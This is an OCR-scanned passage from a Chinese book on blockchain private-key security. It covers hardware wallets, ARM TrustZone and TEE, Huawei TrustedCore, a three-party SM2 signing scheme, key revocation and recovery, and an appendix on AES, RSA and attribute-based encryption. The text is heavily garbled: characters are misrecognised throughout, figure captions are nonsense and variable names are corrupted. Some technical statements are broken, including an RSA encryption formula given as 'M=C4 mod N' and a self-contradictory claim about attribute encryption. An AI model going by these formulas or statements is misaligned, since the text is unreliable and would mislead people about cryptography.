Ledger Nano S 具 有 了 时尚 的 设计 、 直 观 的 用 户 界面 ， 支 持 比特 币 、 莱 特 币 、 以 太 坊 ， 以 及 其 他 多 种 虚拟 加 密 货 币 。 其 安全 性 在 于 在 硬件 内 实现 密 钥 的 生成 ， 使 用 时 通过 PIN 码 认证 。 钱 包 内 置 一 个 显 
示 屏 ， 用 于 检查 显示 的 交易 记录 。 确 认 使 用 物理 按键 ， 如 图 7-4 所 示 。 这 样 即 使 电脑 被 恶意 软件 控制 ， 也 无 法 蔡 代 人 去 确认 交易 。 如 果 缺 少 这 个 设计 ， 可 能 会 产生 远程 劫持 攻击 ， 即 黑客 不 需要 获取 比特 币 
钱包 的 私 铀 ， 可 以 远程 操作 进行 交易 ， 而 用 户 感 知 不 到 。 在 银行 领域 ， 称 这 种 有 屏幕 和 按键 的 U 导 为 二 代 U 盾 ， 反 之 为 一 代 U 盾 。 





图 7-4 交易 确认 


输入 PIN 码 如 图 7-5 所 示 。 


Te 一 





图 7-5 “输入 PIN 码 


2.TREZOR 硬 件 比特 币 钱包 


TREZOR 是 市 场 上 最 古老 的 硬件 钱包 ， 它 除了 支持 比特 币 之 外 ， 还 支持 Zcash、Dash 和 Ethereum (ETH) 。TREZOR 同 样 使 用 硬件 级 的 密 钥 保 护 和 双 因素 认证 。 在 其 产品 资料 里 提 到 的 “只 相信 自己 
的 眼睛 ” “只 相信 自己 的 手 ”， 实 际 上 也 是 指 内 置 的 屏幕 和 物理 按键 确认 。 


3.KeepKey 硬 件 比 特 币 钱包 


KeepKey 采 用 了 类 似 的 安全 设计 ， 效 果 如 图 7-6 所 示 。 
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图 7-6 KeepKey 


CoinPass Bio 是 飞天 诚信 科技 股份 有 限 公 司 推出 的 一 款 数字 货币 硬件 钱包 ， 支 持 指纹 认证 。 在 硬件 上 ， 该 产品 采用 金融 级 高 安全 心 片 ， 在 软件 平台 上 ， 该 产品 采用 了 与 EMVCo 与 CC EAL4+ 同 等 级 别 
的 安全 防护 机 制 ， 大 幅 提 高 了 防 攻击 能 力 。 该 产品 适用 于 基于 区 块 链 技术 的 多 种 数字 货币 ， 全 面 支 持 多 种 安全 算法 ， 通 过 简单 配置 就 可 以 灵活 切换 到 当前 使 用 的 数字 货币 应 用 ;支持 多 种 通信 接口 ， 可 满 
足 PC 端 、 手 机 端 用 户 的 全 方位 需求 。 


CoinPass Bio 的 主要 特色 是 支持 指纹 认证 ， 即 交易 时 需要 通过 指纹 认证 确定 用 户 权 限 。 


小 结 : 比特 币 硬件 钱包 的 安全 性 主要 在 于 私 钥 在 硬件 内 生成 ， 计 算 时 不 出 硬件 ， 使 用 PIN 或 者 指纹 认证 ， 交 易 时 通过 屏幕 和 物理 按键 确认 。 


硬件 钱包 在 安全 性 上 有 具备 很 强 的 优势 ， 但 同样 存在 成 本 较 高 、 不 便携 带 、 手 机 适 配 性 不 好 等 劣势 。 随 着 移动 互联 网 的 普及 ， 手 机 已 经 成 为 “人 体 的 一 部 分 ”一 控制 链接 一 切 的 中 心 ， 链 接 了 人 与 
人 、 人 与 系统 、 人 与 物 联 网 设备 。 如 果 手 机 能 够 作为 私 钥 保 护 的 载体 ， 则 可 以 大 大 提升 方便 性 。Gartner 在 2015 年 发 布 的 《Technology Overview for Phone-as-a-Token》 提 到 ， 到 2018 年 底 将 有 50% 
的 组 织 使 用 手机 作为 认证 设备 。 


所 幸 的 是 ， 手 机 作为 安全 设备 的 条 件 越 来 越 好 ，Android 的 TEE 以 及 iOS 的 Secure Enclave 将 是 主流 智能 手机 的 标 配 ; 同时 内 置 SE 手 机 也 会 越 来 越 多 。 


1.TrustZone 和 和 TEE 介绍 
(1) OMTP (Open Mobile Terminal Platform 开放 移动 终端 开 台 ) 


2006 年 ，OMTP 工 作 组 针对 智能 终端 的 安全 率先 提出 了 一 种 双 系 统 解决 方案 ， 即 在 同一 个 智能 终端 下 ， 除 了 多 媒体 操作 系统 外 再 提供 一 个 隔离 的 安全 操作 系统 ， 这 一 运行 在 隔离 的 硬件 之 上 的 安全 操 
作 系 统 用 来 专门 处 理 敏 感 信息 以 保证 信息 的 安全 。 该 方案 即 TEE 的 前 身 。 


(2) TrustZone 


基于 OMTP 的 方案 ，ARM 公 司 于 2006 年 提出 了 一 种 硬件 虚拟 化 技术 一 一 TrustZone 及 其 相关 硬件 实现 方案 。TrustZone 是 通过 ARM 架 构 安 全 扩展 引入 的 ， 属 于 支持 TEE 技 术 的 产品 ， 而 ARM 也 就 成 为 
了 TEE 技 术 的 主导 者 之 一 。 上 


TrustZone 技 术 出 现在 ARMVv6KZ 以 及 较 晚 期 的 应 用 核心 架构 中 。 与 处 理 器 紧密 集成 ， 并 通过 总 线 和 特定 的 TrustZone 系 统 模块 进行 扩展 ， 可 保护 安全 内 存 、 加 密 块 、 键 盘 和 屏幕 等 外 设 ， 从 而 可 确保 
它们 免 遭 软件 攻击 。ARM 并 没有 把 TrustZone 设 计 成 能 够 解决 所 有 的 安全 问题 ， 其 目标 是 希望 TrustZone 能 把 一 些 安全 性 要 求 高 的 代码 放 在 安全 区 域 里 执行 ， 这 也 是 TrustZone 名 字 的 由 来 。 


(3) GlobalPlatform 


ARM 后 来 将 其 TrustZone API 提 供给 GlobalPlatform (简称 GP) ， 该 API 已 发 展 为 TEE 客 户 端 API。GlobalPlatform 是 Visa、MasterCard 等 国际 银行 卡 组 织 主导 的 国际 标准 化 组 织 ， 从 2011 年 起 开始 
起 草 制 定 相关 的 TEE 规 范 标准 ， 并 联合 一 些 公 司 (ARM 等 ) 共同 开发 基于 GP TEE 标 准 的 可 信 操 作 系 统 。 因 此 ， 如 今 大 多 数 基于 TEE 技 术 的 Trust OS 都 遵循 了 GP 的 标准 规范 。TEE 可 以 认为 是 将 TrustZone 
技术 进行 标准 化 的 结果 。 


(4) TEE 


TEE (Trust Execution Environment， 可 信和 执行 环境 ) 是 和 REE (Rich Execution Environment) 相对 应 的 ， 一 般 称 TEE 和 REE 为 Secure World 和 Normal World。Linux 跑 在 Normal World 上 ， 但 
是 有 些 安全 性 要 求 比较 高 的 行为 ， 例 如 指纹 的 比 对 、 支 付 时 用 私 钥 签名 的 动作 等 ， 需 要 放 到 Secure World 中 去 。TEE 安 全 框架 如 图 7-7 所 示 。 


TEE 具 有 其 自身 的 执行 空间 ， 也 就 是 说 在 TEE 环 境 下 也 要 有 一 个 操作 系统 。TEE 环 境 比 Rich OS (普通 操作 系统 ) 的 安全 级 别 更 高 ， 但 是 比 起 安全 元 件 (SE， 通 常 是 智能 卡 ) 的 安全 性 要 低 一 些 ; 另 一 
方面 ， 加 入 TEE 的 成 本 增加 比较 低 ，SE 的 成 本 则 更 高 。 从 总 体 上 看 ，TEE 提 供 了 安全 与 成 本 的 平衡 。 


TEE 所 能 访问 的 软 硬 件 资 源 是 与 Rich OS 分 离 的 。TEE 提 供 了 授权 安全 软件 (可 信 应 用 (Trust App，TA) ) 的 安全 执行 环境 ， 同 时 也 保护 TA 的 资源 和 数据 的 保密 性 、 完 整 性 和 访问 权限 。 为 了 保证 
TEE 本 身 的 可 信 根 ，TEE 在 安全 启动 过 程 中 是 要 通过 验证 并 且 与 Rich OS 隔离 的 。 在 TEE 中 ， 每 个 TA 是 相互 独立 的 ， 而 且 不 能 在 未 授权 的 情况 下 互相 访问 。 


Rich OS application environmeni Trusted execution environment 


LT =Ie Kele]e) Trusted app 
telematics & FOTA & 
authentication integrity Mgmt 


©j[ejelelly [lel] eld GlobalPlatform TEE interna| APls 
Trusted OS components 


TEE Trusted Trusted 
comm. core drivers 
agent framework 


"IoION 


Arm trusted firmwoare 


HW Keys, Secure storage, Trusted UI (Keypoad screen|, 
Cryplo occelerators, Secure elemen', etc. 


molfo lol elitel HW secure resources 





图 7-7 TEE 安 全 框架 


TEE 与 Rich OS 之 间 的 接口 称 为 TEE Client API，GlobalPlatform 于 2010 年 对 其 进行 了 标准 化 ， 可 信 应 用 程序 与 可 信和 操作 系统 乙 间 的 TEE Internal API 于 2011 年 完成 。 


TEE 可 支持 由 不 同 提供 商 开 发 的 相互 独立 执行 的 多 个 可 信 应 用 程序 。 通 过 TEE Internal API， 可 信 应 用 程序 可 获得 对 安全 资源 和 服务 的 受 控 访问 。TEE 安 全 服务 的 示例 包括 : 安全 存储 、 密 铀 管理 、 加 
密 、 安 全 时 钟 、 可 信用 户 界面 。 除 了 TEE 的 运行 环境 与 普通 操作 系统 相互 独立 外 ，TEE 里 的 每 一 个 TA 也 是 需要 授权 并 相互 独立 运行 的 。 
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2 .基于 TEE 的 移动 钱包 





【 


若 实 现 基 于 TEE 的 移动 钱包 ， 需 要 解决 的 安全 问题 有 : 密 钥 的 生成 与 安全 存储 、 密 钥 安 全 调用 (加密 签 名 ) 、 可 信用 户 界面 和 交互 (可 信和 的 输入 ) 。 基 于 TEE 完 全 可 以 做 到 。 以 下 以 华为 TEE- 
TrustedCore 为 例 介 绍 如 何 实现 可 信 移 动 钱包 。 


华为 的 TrustedCore 系 统 架 构 如 图 7-8 所 示 。 

其 提供 的 安全 功能 如 下 。 
(1) 安全 存储 
.可 对 数据 和 密 钥 进 行 保 存 ， 并 保证 其 秘密 性 和 完整 性 。 与 此 同时 ， 数 据 、 密 钥 与 设备 进行 绑 定 ， 复 制 到 其 他 设备 后 无 法 读 取 。 
` 秘密 性 : 存储 的 数据 为 密 文 。 


完整 性 : 当 数 据 被 其 他 程序 修改 后 ，TtustedCote 能 够 检测 到 这 种 变化 。 此 特性 能 保证 数据 的 完整 性 。 
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图 7-8 ”华为 TrustedCote 系 统 架 构 
* 与 设备 绑 定 : 一 个 设备 存储 介质 中 的 内 容 不 能 被 另 一 个 设备 读 取 。 
“ 存储 隔离 : 不 同安 全 应 用 存储 的 内 容 互 相隔 离 ， 不 能 互相 访问 。 
(2) 加 解密 
TrustedCore 支 持 多 种 加 解密 算法 ， 用 户 在 开发 安全 服务 时 ， 可 选用 如 下 加 解密 算法 中 的 一 种 用 于 对 自身 数据 进行 加 密 和 解密 。 
. 摘要 算法 : SHA1、SHA224、SHA256、SHA384、SHA512、SM3。 
. 对 称 加 解密 算法 : AES、DES、3DES、SM4。 
. 非 对 称 加 解密 算法 : RSA、ECC、SM2。 
同时 ，TrustedCore 提 供 了 安全 的 基准 时 间 ， 该 时 间 不 能 被 安全 应 用 或 Android 应 用 修改 ， 因 此 可 以 更 好 地 防范 恶意 软件 。 
(3) TUI 
解决 显示 和 输入 问题 ， 如 图 7-9 所 示 。 
关键 内 容 的 展示 和 确认 由 TEE 控 制 ， 此 时 恶意 程序 无 法 操作 屏幕 。 


综 上 ， 利 用 TEE 可 以 实现 移动 钱包 针对 私 钥 保 护 的 关键 措施 。 
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图 7-9 UI 


3. 基 于 多 方 密 钥 协同 的 移动 钱包 


TEE 是 基于 处 理 器 由 软件 定义 的 安全 系统 ， 其 安全 性 仍 低 于 SE。 在 国内 的 金融 和 政务 应 用 中 ， 国 家 在 全 面 推广 SM2 国 产 算法 。 目 前 TEE 国 际 标准 还 不 支持 SM2。 实 际 上 ， 私 钥 除 了 用 于 比特 币 交易 外 ， 
还 可 以 用 于 基于 区 块 链 技术 的 身份 认证 、 电 子 合同 签名 以 及 数字 资产 交易 等 。 针 对 以 上 情况 ， 行 业内 也 推出 了 一 些 创新 的 方案 ， 进 一 步 优化 了 TEE 的 安全 性 ， 又 支持 了 SM2 算 法 ， 满 足 了 合 规 性 。 


多 方 密 钥 协同 的 基本 原理 是 把 私 钥 分 散 到 多 方 (两 方 、 三 方 或 多 方 ) ， 由 多 方 分 别 独 立 生成 密 钥 因子 ， 使 用 时 独立 计算 ， 数 据 经 过 二 次 换算 后 形成 签名 值 。 计 算 过 程 中 ， 各 自 的 密 钥 因子 在 各 方 内 部 
独立 计算 ， 密 钥 因 子 不 在 互联 网 传输 。 


以 移动 端 、 应 用 端 ”、 密 码 服 务 中 心 三 方 为 例 ， 移 动 App 完 成 移动 密 钥 因子 的 生成 、 安 全 存储 和 使 用 ， 应 用 服务 端 完 成 应 用 服务 端的 密 钥 因子 的 生成 、 安 全 存储 和 使 用 ， 密 码 服 务 端 负责 密码 服务 端的 
密 钥 因子 的 生成 、 安 全 存储 和 使 用 。 其 中 应 用 端 和 密码 服务 中 心 使 用 密码 机 完成 随机 数 的 生成 、 密 钥 因子 的 保护 和 使 用 ， 移 动 App 使 用 TEE 完 成 密 钥 因子 的 生成 、 保 护 和 使 用 。 


中 


实现 步骤 如 下 。 
1) 密 钥 生成 流程 : 移动 端 、 应 用 端 、 密 码 服 务 中 心 三 方 共 同 生成 一 个 SM2 密 钥 。 
Q@ 手 机 上 产生 随机 数 d1,d1=MobileGenRand0。 
. 从 d1 计 算 中 间 数 据 p1,p1=Encode(d1)。 
' 使 用 应 用 端的 公 钥 加 密 p1,p1” =Encrypt(p1,SerPubKey)。 
.发送 p1 到 应 用 端 。 
@ 应 用 端 解密 p1,p1=Decrypt(p1,SerPriKey)。 
` 应 用 端 调用 密码 机 生成 随机 数 d2,d2=HSMGenRand(0) 。 
. 根据 42 和 pl 计算 中 间 数 据 p2,p2=Encode(d2,p1)。 
. p2 使 用 密码 服务 中 心 的 公 角 加密，p2” =Enctypt(p2,TDSerPubKey)。 
. 发 送 p2” 到 密码 服务 中 心 。 
密码 服务 中 心 解密 p2',p2=Decrypt(p2',TDSerPriKey)。 
密码 服务 中 心 调用 密码 机 生成 随机 数 d3,d3=HSMGenRand()。 
根据 d3 和 p2 计 算得 到 用 户 公 铀 ，UserPubKey=GenPubKey(d3,p2)。 
@ 移 动 端 、 应 用 端 、 密 码 服务 中 心 分 别 保存 d1、d2、d3。 
2) 手机 端 密 钥 因 子 保护 的 方法 : 移动 端的 密 钥 因子 通过 TEE/SE、 绑 定 设备 硬件 、 指 纹 、 口 令 等 综合 手段 保护 。 
@ 在 TEE/SE 内 产生 一 对 非 对 称 算法 的 设备 密 钥 : DevKey=GenKeypairByTEE/SE()。 
@ 使 用 设备 密 钥 的 公 钥 加 密 d1，d1'=Encrypt(d1,DevPubKey)。 
其 中 TEE/SE 对 设备 密 钥 的 访问 控制 支持 指纹 或 本 地 口令 认证 。 


3) 密 钥 使 用 流程 : 用 户 在 移动 端 通过 认证 后 ， 移 动 端 、 应 用 端 、 密 码 服务 中 心 三 方 各 自 根 据 自身 的 密 钥 因子 对 数据 进行 运算 ， 运 算 结果 再 进行 二 次 运算 形成 最 后 结果 。 


@ 在 手机 上 输入 手机 设备 密 钥 登 入 命令 (指纹 或 口令 ) ， 调 用 手机 的 设备 私 铀 ， 对 d1 进行 解密 ， 得 到 d1，d1=Decypt(d1,DevPriKey)。 
@ 移 动 端 使 用 d1 对 待 处理 的 数据 进行 计算 ， 得 到 中 间 结 果 s1，s1=Sign1(d1,HashData)。 

@ 发 送 s1 到 应 用 端 。 

@ 应 用 端 调 用 密码 机 解密 d2'，d2=Decypt(d2',HSMPriKey)。 

@@ 使 用 d2 对 待 处理 的 数据 进行 计算 ， 得 到 s2，s2=Sign2(d2,s1,HashData)。 

@@ 密 码 服务 中 心 调 用 密码 机 解密 d3'，d3=Decypt(d3,HSM PriKey)。 

@ 使 用 d3 对 待 处理 的 数据 进行 计算 ， 得 到 33，s3=Sign3(d3,s2,HashData)。 

@s1、s2、s3 经 过 二 次 合成 计算 形成 最 后 签名 结果 S,，S=SignEnd(s1,s2,s3)。 

综 上 ， 基 于 多 方 密 钥 协 同 技术 ， 可 以 分 散 密 钥 保护 的 风险 ， 大 大 提升 黑客 攻击 的 成 本 ， 不 依赖 TEE 自 身 的 密 钥 算 法 实现 SM2 国 密 算法 。 


[1] Intel 公 司 也 提出 了 类 似 的 基于 独立 双 硬 件 的 技术 解决 方案 ， 但 是 在 移动 芯片 领域 ARM 一 直 处 于 领导 地 位 ， 两 者 的 芯片 采用 了 不 同 的 底层 架构 ， 众 多 开发 者 总 是 会 优先 针对 ARM 的 芯片 应 用 进行 优化 。 


7.6 ” 浅 析 私 钥 更 新 、 找 回 与 吊销 


从 密码 破译 角度 来 说 ， 私 钥 在 使 用 一 定 周 期 后 应 该 及 时 更 换 ， 这 就 涉及 私 钥 更 新 的 问题 ， 如 果 发 现 私 钥 丢 失 或 者 怀疑 私 钥 泄 漏 ， 则 涉及 密 钥 的 吊销 问题 。 在 PKI/CA 领 域 ， 一 般 是 通过 数字 证 书 的 有 效 
期 来 绑 定 密 钥 的 有 效 期 ， 比 如 一 年 。 一 年 后 密 钥 更 新 ， 重 新 申请 证 书 ， 应 用 系统 重新 绑 定 该 密 钥 。 对 于 历史 数据 ， 签 名 密 钥 可 以 平滑 过 渡 。 新 签名 密 钥 生成 后 ， 旧 签名 密 钥 直接 去 弃 即 可 ， 其 历史 签名 结 
果 仍 可 以 由 原 数 字 证 书 ( 公 钥 ) 验证 。 而 加 密 密 钥 加 密 的 数据 ， 必 须 使 用 旧 密 钥 解 密 后 重新 使 用 新 密 钥 加 密 ， 否 则 历史 加 密 数 据 无 法 解密 。 对 于 私 钥 丢 失 或 者 怀疑 私 钥 泄漏 的 情况 ， 可 以 向 CA 机 构 申 请 吊 
销 。CA 机 构 审核 通过 后 会 签署 证 书 吊 销 列 表 (Certificate Rovocation List，CRL) 文件 。CRL 里 声明 了 数字 证 书 序 列 号 、 吊 销 时 间 、 吊 销 原 因 等 信息 ， 名 列 其 中 的 数字 证 书 的 签名 将 被 视 为 无 效 。 对 于 加 
密 密 钥 丢 失 的 情况 ， 可 以 通过 CA 机 构 向 密 钥 管理 中 心 (Key Manage Center，KMC) 申请 找 回 。 国 内 实行 双 密 钥 体系 ， 即 签名 密 钥 和 加 密 密 钥 两 对 密 钥 。 签 名 密 钥 仅 用 于 签名 ， 由 用 户 自行 生成 ; 加 密 
密 钥 仪 用 于 加 密 /解密 ， 由 CA 机 构 向 密 钥 管理 中 心 申请 生成 。 密 钥 管 理 中 心 由 国家 权威 机 构 ， 其 最 重要 的 职能 就 是 为 用 户 产 生 加 密 密 钥 对 并 提供 私 钥 的 托管 服务 。 CA 机 构 签发 证 书 时 ， 都 是 经 过 实名 认证 
的 ， 假 如 密 钥 丢 失 ， 只 要 再 次 确认 用 户 实名 身份 ， 就 可 以 帮助 用 户 找 回 密 钥 。 


区 块 链 和 PKIMCA 相 比 ， 很 多 情况 发 生 了 变化 ， 珊 来 了 很 多 新 的 挑战 。 区 块 链 没有 双 密 钥 体 系 的 概念 ， 仅 有 一 个 密 钥 对 。 该 私 钥 唯 一 代表 用 户 身份 、 数 字 货 币 或 数字 资产 ， 这 些 数字 货币 或 数字 资产 必 
须 使 用 私 铀 “打开 ”,， 每 次 “人 花 钱 ”的 时 候 必须 使 用 私 铀 签名 。 也 就 是 说 ， 私 钥 丢 不 得 ， 私 铀 丢 了 就 等 于 资产 消失 了 。 


分 析 来 看 ， 受 到 私 钥 影 响 的 环节 至 少 包括 数字 货币 、 数 字 资产 、 身 份 认证 、 智 能 合约 。 具 体 又 分 3 种 情况 : 私 钥 使 用 了 一 定期 限 ， 需 要 主动 更 新 ; 私 钥 在 手 但 怀疑 泄漏 ， 需 要 吊销 ; 私 钥 彻 底 丢 失 。 


如 果 更 新 密 铀 ， 则 需要 把 数字 货币 、 数 字 资 产 全 部 转移 到 新 的 地 址 ; 如 果 用 于 身份 认证 ， 则 需要 使 用 新 密 铀 重新 绑 定 用 户 ;如果 该 密 钥 绑 定 了 智能 合约 ， 则 需要 更 新 智能 合约 。 这 种 更 新 是 在 用 户 可 
控 的 情况 下 进行 的 ， 用 户 拥有 旧 密 铀 ， 产 生 一 个 新 密 铀 后 ， 主 动 以 自助 的 方式 进行 转移 或 重新 绑 定 。 


私 钥 在 手 但 怀疑 泄漏 需要 吊销 的 ， 也 要 及 时 进行 密 钥 更 新 。 但 如 何 确保 执行 密 钥 更 新 的 人 就 是 原来 的 用 户 呢 ? 这 就 需要 引入 一 些 机 制 ， 证 明 “ 你 是 私 铀 的 拥有 者 ”并 对 私 钥 对 应 的 数字 货币 或 资产 进 
行 额外 的 保护 。 比 如 在 公有 和 链 ， 用 户 可 以 使 用 自己 另外 一 个 密 钥 Kkey0 提 前 在 区 块 链 网 络 上 隐秘 地 登记 某 一 个 密 钥 Key 的 所 有 权 。 当 怀疑 密 钥 key 港 漏 时 ， 可 以 使 用 key0 证 明 用 户 对 key 的 所 有 权 ， 然 后 完成 
数字 货币 和 资产 的 转移 ， 同 时 对 key 声 明 吊 销 。 此 过 程 可 以 发 展 成 一 个 单独 的 协议 。 假 如 key0 也 发 生 了 泄漏 ， 则 需要 额外 的 设计 。 比 如 在 一 个 或 多 个 权威 机 构 (如 CA 机 构 ) 提前 注册 个 人 实名 信息 ， 怀 疑 
密 钥 泄 漏 时 ， 向 权威 机 构 申请 ， 经 过 审核 后 ， 多 个 权威 机 构 和 用 户 密 钥 使 用 多 重 签名 进行 数字 货币 或 资产 的 转移 ， 并 声明 旧 密 钥 的 吊销 。 在 联盟 链 中 ， 比 较 容易 接受 此 类 规则 ;在 公有 链 中 ， 需 要 打破 完 
全 去 中 心 化 的 理念 才 可 以 推行 此 规则 。 


区 块 链 领 域 最 大 的 挑战 是 私 钥 彻 底 丢 失 。 传 统 中 心 化 的 银行 如 果 U 盾 丢失 或 者 筷 记 密码 ， 则 通过 账户 系统 重新 绑 定 一 个 新 的 U 盾 ( 私 钥 ) 即 可 。 账 户 和 私 钥 是 逻辑 上 的 绑 定 关系 ， 由 中 心 化 的 银行 在 满 
足 风 控 要 求 下 操作 。 而 比特 币 或 区 块 链 的 私 钥 是 直接 操作 数字 货币 的 钥匙 ， 万 一 丢失 了 就 等 于 钱 消失 了 。 所 以 ， 密 钥 的 找 回 就 显得 特别 必要 。 如 果 用 户 自 行将 密 钥 备份 ， 则 备份 点 容易 成 为 黑客 攻击 点 。 
一 个 完善 的 落地 的 区 块 链 网 络 ， 应 该 设计 一 种 机 制 : 私 钥 由 用 户 拥 有 和 控制 ， 但 在 风险 发 生 时 ， 可 以 通过 实名 认证 的 方式 、 国 家 权威 机 构 参 与 的 方式 或 其 他 更 高 代价 的 方式 找 回 该 密 钥 。 


比如 参考 经 典 的 门限 算法 ， 在 t/n 门 限 方案 中 ， 一 个 秘密 拆 分 成 n 份 共享 或 影子 ， 每 个 用 户 秘密 保存 其 中 一 份 共 享 ， 任 意 t 个 或 多 于 t 个 用 户 联 合 起 来 堆积 他 们 的 共享 ， 就 可 以 正确 恢复 秘密 ， 而 任意 少 
于 t 个 用 户 却 不 能 。 这 样 ， 即 使 和 有 小 于 t 个 用 户 保存 的 共享 份额 泄漏 或 去 失 ， 政 手 也 不 能 由 此 计算 得 到 密 钥 。 


例如 ， 把 用 户 的 私 钥 拆 分 成 5 份 ， 除 了 用 户 自行 保存 一 份 外 ， 其 他 4 份 独立 保存 在 某 些 权 威 机 构 ， 如 第 三 方 CA 机 构 等 。 具 备 其 中 任意 3 份 即 可 恢复 用 户 密 钥 。 密 钥 托 管 时 ， 用 户 经 过 严格 的 身份 实名 认 
证 ; 密 钥 恢复 时 ， 同 样 执行 严格 的 身份 实名 认证 的 手续 和 严格 的 运营 管理 制度 。 政 府 管理 部 门 ， 比 如 工信部 也 可 以 出 台 相 关 政 策 ， 对 密 钥 托管 的 机 构 明 确 职 责 和 技术 要 求 ， 从 而 确保 用 户 私 钥 的 安全 性 。 


私 钥 更 新 、 找 回 与 吊销 是 一 个 不 可 回避 的 问题 ， 以 上 仪 仅 提 出 一 些 畅想 和 思路 ， 后 续 还 需要 广大 区 块 链 从 业者 设计 出 更 加 可 靠 的 落地 方案 。 


7.7 ”本章 小 结 


私 钥 安全 在 区 块 链 技术 中 至 天 重要 ， 必 须 对 其 进行 全 生命 周期 管理 。 本 章 分 析 了 当前 区 块 链 私 钥 使 用 的 问题 ， 前 述 了 私 钥 保 护 的 正确 “姿势 ”， 并 讨论 了 硬件 钱包 、 移 动 钱包 的 特性 ， 以 及 私 铀 更 
新 、 找 回 、 吊 销 等 方面 的 挑战 。 


总 之 ， 如 何 满足 安全 与 便捷 ， 同 时 满足 合 规 的 要 求 ， 是 区 块 链 从 业者 当前 亚 待 解决 的 问题 。 


附录 A 区 块 链 安全 基础 概念 、 原 理 与 分 析 万 法 


A.1 加密 技术 


将 明文 变 成 密 文 的 过 程 称 为 加 密 (Encryption) 。 加 密 技术 可 以 分 为 对 称 加 密 和 非 对 称 加 密 ， 非 对 称 加 密 又 称 公 钥 加 密 。 对 称 加 密 中 ， 加 密 密 钥 和 解密 密 钥 相 同 或 彼此 之 间 容 易 相互 确定 ; 而 公 钥 加 
密 中 ， 加 密 密 钥 和 解密 密 钥 是 不 同 的 ， 攻 击 者 很 难 从 加 密 密 钥 推 导出 解密 密 钥 。 上 典型 的 对 称 密码 有 DES、AES、IDEA、SM4、A5/1、RC4 等 ; 典型 的 公 钥 密 码 有 RSA、ECC、3SM2 和 NTRU 等 。 


对 称 加 密 又 分 为 流 密码 和 分 组 密码 ，DES、AES、1IDEA 和 3M4 属 于 分 组 密码 ， 而 A5/1、RC4 是 流 密码 。 流 密码 具有 实现 简单 、 便 于 硬件 实现 、 加 /解密 处 理 速 度 快 等 优点 ， 缺 点 是 低 扩散 ， 对 插入 或 修 
改 不 敏感 ， 分 组 密码 使 用 了 不 随时 间 变 化 的 固定 变换 ， 具 有 扩散 性 好 、 插 入 敏感 等 优点 。 在 此 以 AES 为 例 ， 介 绍 对 称 密码 的 流程 。 


AES 发 布 于 2001 年 。 它 有 3 种 可 选 的 密 钥 长 度 : 128 比 特 、192 比 特 和 256 比 特 。AES 是 一 种 迭代 型 密码 ， 轮 数 依赖 于 密 钥 长 度 。 如 果 密 钥 长 度 为 128 比 特 ， 轮 数 为 10; 当 密 钥 长 度 为 192 比 特 时 ， 轮 数 
为 12; 如 果 密 钥 长 度 为 256 比 特 ， 轮 数 为 14。 图 A-1 展 示 了 128 比 特 AES 的 加 密 流程 。 
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图 A-1 AFS 流 程 图 


先 把 明文 进行 分 组 ， 每 一 组 是 16 个 字 节 ， 初 始 成 state， 然 后 与 128 比 特 的 密 钥 进 行 异 或 ; 接着 进行 9 轮 操 作 ， 每 一 轮 包括 S 盒 代 换 、 行 移 位 、 列 混淆 和 异 或 轮 密 钥 ; 再 进入 第 十 轮 ， 这 一 轮 比 前 面 每 一 
轮 少 了 列 混淆 操作 ; 最 后 输出 128 比 特 的 密 文 。 


解密 时 ， 只 需 将 所 有 操作 逆序 进行 ， 并 逆序 使 用 密 钥 编 排 方 案 即 可 。 目 前 广泛 应 用 的 是 RSA 和 ECC。 


相对 来 说 ，RSA 比 较 容易 理解 。 下 面 就 以 RSA 加 密 体制 为 例 ， 来 介绍 公 钥 密 码 。 随 机 生成 两 个 足够 大 的 素数 p,q， 计 算出 它们 的 乘积 N=p.q; 选择 与 乘积 (p-1) * (q-1) 互 素 的 整数 e， 计 算 e 模 (P- 
1) .(q-1) 的 乘法 逆 元 ， 命 名 为 d， 即 d=e-1mod (p-1) . (q-1) 。 这 里 p，q，d 是 私 钥 ，N，e 是 公 钥 。 当 N 充 分 大 时 ， 比 如 N 大 于 2048 比 特 ， 则 分 解 N 是 非常 困难 的 。 这 就 是 大 整数 分 解 问题 ， 它 保证 
了 RSA 密 码 的 安全 性 。 加 密 明文 M 只 需 计算 : 


M=C4 mod N 


从 以 上 流程 可 以 大 至 了 解 公 钥 加 密 。 


A.2 属性 加 密 


属性 密码 的 概念 最 早出 现在 2004 年 。 利 用 双 线 性 对 可 以 构造 属性 密码 ， 国 家 密码 管理 局 在 SM9 标 准 中 已 经 对 双 线 性 对 进行 了 规范 。 在 属性 加 密 机 制 中 ， 密 文 和 密 钥 都 与 一 组 属性 相关 ， 比 如 {中 国 、 上 
海 、 金 融 公 司 }， 加 密 者 可 根据 要 加 密 的 内 容 和 接收 者 的 特征 信息 制定 一 个 由 属性 构成 的 加 密 策略 ， 而 产生 的 密 文 只 有 属性 满足 加 密 策略 的 用 户 才 可 以 解密 。 一 个 属性 加 密 方案 主要 由 以 下 4 个 算法 组 成 。 


. Setup(k,U): 该 算法 输入 安全 参数 Ek 和 一 个 系统 属性 描述 U， 输 出 公共 参数 PK 和 一 个 主 私 钥 MSK。 

. Keygen(MSK,?): 该 算法 输入 主 私 钥 MSK 和 一 个 访问 结构 义 ， 输 出 一 个 与 属性 相关 的 密 钥 SKx。 

` Enc(PK,Y,m): 该 算法 输入 公共 参数 PK、 一 个 加 密 策 略 Y 和 一 个 要 加 密 的 消息 m， 输 出 密 文 CTy。 

Dec(PK,SKx,CTy): 该 算法 输入 公共 参数 PK、 密 钥 SKx 和 密 文 CTy， 当 用 户 的 访问 结构 义 满足 加 密 策 略 Y 时 ， 就 输出 明文 m; 否则 就 输出 错误 信息 。 
首先 ， 当 解密 密 钥 得 到 恰当 保存 时 ， 非 法 的 访问 者 是 没有 解密 密 钥 的 ， 所 以 加 密 可 以 阻止 非法 的 用 户 访问 受 保护 的 资源 。 
其 次 ， 在 属性 加 密 系 统 中 ， 即 使 拥有 密 钥 SK 的 合法 用 户 也 不 能 解密 ， 实 现 了 防止 合法 的 用 户 对 受 保护 的 资源 进行 非 授权 访问 。 


最 后 ， 只 有 当 用 户 的 属性 X 满 足 加 密 策略 Y 时 ， 他 的 密 铀 SKx 才 可 以 正确 解密 出 明文 m， 即 允许 合法 用 户 访问 受 保护 的 网 络 资源 。 


A.3 同 态 加 密 
传统 公 钥 加 密 方案 包含 3 个 算法 : 密 钥 生成 、 加 密 和 解密 。 密 钥 生 成 是 一 个 随机 算法 ， 输 入 安全 参数 ， 输 出 私 钥 SK 和 公 钥 PK; 加 密 算 法 输入 公 钥 PK 和 明文 m， 输 出 密 文 C; 而 解密 算法 输入 私 钥 SK 和 
密 文 C， 输 出 明文 m。 


